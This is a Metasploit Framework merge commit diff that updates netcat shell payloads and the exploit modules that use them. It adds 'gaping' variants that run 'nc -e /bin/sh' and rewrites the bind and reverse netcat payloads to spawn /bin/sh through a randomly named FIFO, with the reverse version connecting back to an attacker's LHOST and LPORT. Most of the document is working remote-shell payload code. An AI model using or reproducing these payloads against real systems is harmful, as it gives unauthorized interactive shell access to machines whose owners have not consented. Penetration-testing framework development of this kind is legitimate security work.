Merge remote-tracking branch 'jvazquez-r7/netcat_gaping' into rapid7

[Closes #1576]

lib/msf/ui/console/command_dispatcher/exploit.rb

@@ -253,7 +253,7 @@ class Exploit
 			'cmd/unix/interact',
 			'cmd/unix/reverse',
 			'cmd/unix/reverse_perl',
-			'cmd/unix/reverse_netcat',
+			'cmd/unix/reverse_netcat_gaping',
 			'windows/meterpreter/reverse_nonx_tcp',
 			'windows/meterpreter/reverse_ord_tcp',
 			'windows/shell/reverse_tcp',

modules/exploits/linux/http/ddwrt_cgibin_exec.rb

@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'DisableNops' => true,
 					'Compat'      =>
 						{
-							'RequiredCmd' => 'generic netcat-e'
+							'RequiredCmd' => 'generic netcat netcat-e'
 						}
 				},
 			'Targets'        =>

modules/exploits/linux/http/wanem_exec.rb

@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic netcat-e',
+							'RequiredCmd' => 'generic netcat netcat-e',
 						}
 				},
 			'DefaultOptions' =>

modules/exploits/linux/http/zen_load_balancer_exec.rb

@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic netcat-e perl bash',
+							'RequiredCmd' => 'generic netcat netcat-e perl bash',
 						}
 				},
 			'Targets'        =>

modules/exploits/unix/http/ctek_skyrouter.rb

@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic perl telnet netcat-e bash',
+							'RequiredCmd' => 'generic perl telnet netcat netcat-e bash',
 						}
 				},
 			'Platform'       => 'unix',

modules/exploits/unix/webapp/generic_exec.rb

@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic perl telnet netcat-e bash',
+							'RequiredCmd' => 'generic perl telnet netcat netcat-e bash',
 						}
 				},
 			'Platform'       => 'unix',

modules/exploits/unix/webapp/google_proxystylesheet_exec.rb

@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic perl bash telnet netcat-e',
+							'RequiredCmd' => 'generic perl bash telnet netcat netcat-e',
 						}
 				},
 			'Platform'       => 'unix',

modules/exploits/unix/webapp/hastymail_exec.rb

@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic perl ruby python netcat-e',
+							'RequiredCmd' => 'generic perl ruby python netcat netcat-e',
 						}
 				},
 			'Platform'       => ['unix'],

modules/exploits/unix/webapp/narcissus_backend_exec.rb

@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Compat'         =>
 				{
 					'PayloadType' => 'cmd',
-					'RequiredCmd' => 'generic perl ruby python bash netcat-e'
+					'RequiredCmd' => 'generic perl ruby python bash netcat netcat-e'
 				},
 			'Targets'        =>
 				[

modules/exploits/unix/webapp/php_charts_exec.rb

@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 						'PayloadType' => 'cmd',
-						'RequiredCmd' => 'generic telnet bash netcat-e perl ruby python',
+						'RequiredCmd' => 'generic telnet bash netcat netcat-e perl ruby python',
 						}
 				},
 			'DefaultOptions'  =>

modules/payloads/singles/cmd/unix/bind_netcat.rb

@@ -10,23 +10,28 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module Metasploit4
 
 	include Msf::Payload::Single
 	include Msf::Sessions::CommandShellOptions
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e)',
+			'Name'          => 'Unix Command Shell, Bind TCP (via netcat)',
 			'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-			'Author'        => 'hdm',
+			'Author'         =>
+				[
+					'm-1-k-3',
+					'egypt',
+					'juan vazquez'
+				],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
 			'Arch'          => ARCH_CMD,
 			'Handler'       => Msf::Handler::BindTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd',
-			'RequiredCmd'   => 'netcat-e',
+			'RequiredCmd'   => 'netcat',
 			'Payload'       =>
 				{
 					'Offsets' => { },
@@ -46,7 +51,8 @@ module Metasploit3
 	# Returns the command string to use for execution
 	#
 	def command_string
-		"nc -lp #{datastore['LPORT']} -e /bin/sh"
+		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
+		"mknod /tmp/#{backpipe} p; (nc -l -p #{datastore['LPORT']} ||nc -l #{datastore['LPORT']})0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
 	end
 
 end

modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb

@@ -0,0 +1,52 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e)',
+			'Description'   => 'Listen for a connection and spawn a command shell via netcat',
+			'Author'        => 'hdm',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'netcat-e',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		"nc -l -p #{datastore['LPORT']} -e /bin/sh"
+	end
+
+end

modules/payloads/singles/cmd/unix/reverse_netcat.rb

@@ -10,23 +10,28 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module Metasploit4
 
 	include Msf::Payload::Single
 	include Msf::Sessions::CommandShellOptions
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Reverse TCP (via netcat -e)',
+			'Name'          => 'Unix Command Shell, Reverse TCP (via netcat)',
 			'Description'   => 'Creates an interactive shell via netcat',
-			'Author'        => 'hdm',
+			'Author'         =>
+				[
+					'm-1-k-3',
+					'egypt',
+					'juan vazquez'
+				],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
 			'Arch'          => ARCH_CMD,
 			'Handler'       => Msf::Handler::ReverseTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd',
-			'RequiredCmd'   => 'netcat-e',
+			'RequiredCmd'   => 'netcat',
 			'Payload'       =>
 				{
 					'Offsets' => { },
@@ -46,7 +51,8 @@ module Metasploit3
 	# Returns the command string to use for execution
 	#
 	def command_string
-		"nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
+		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
+		"mknod /tmp/#{backpipe} p; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe} "
 	end
 
 end

modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb

@@ -0,0 +1,52 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (via netcat -e)',
+			'Description'   => 'Creates an interactive shell via netcat',
+			'Author'        => 'hdm',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'netcat-e',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		"nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
+	end
+
+end